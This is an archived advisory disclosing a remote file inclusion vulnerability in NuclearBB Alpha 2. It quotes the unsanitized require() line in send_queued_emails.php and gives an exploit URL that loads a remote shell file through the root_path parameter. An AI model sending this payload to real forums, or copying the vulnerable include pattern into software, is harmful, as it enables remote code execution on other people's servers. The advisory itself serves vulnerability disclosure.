TUCoPS :: Web BBS :: etc :: tb12478.htm

NuclearBB Alpha 2 Remote File Inclusion
NuclearBB Alpha 2 Remote File Inclusion
NuclearBB Alpha 2 Remote File Inclusion


Vuln Product: NuclearBB Alpha 2
Vendor: http://www.nuclearbb.com/ 
Vulnerability Type: Remote File Inclusion
Autor: Infection
Team: Rootshell Security Team
Vulnerable file: /NuclearBB/tasks/send_queued_emails.php
Exploit URL: http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt? 
Method: get
Register_globals: On
Vulnerable variable: root_path
Line number: 14
Lines: 

----------------------------------------------

require("$root_path/inc/functions_email.php");
$mail = new email;

----------------------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH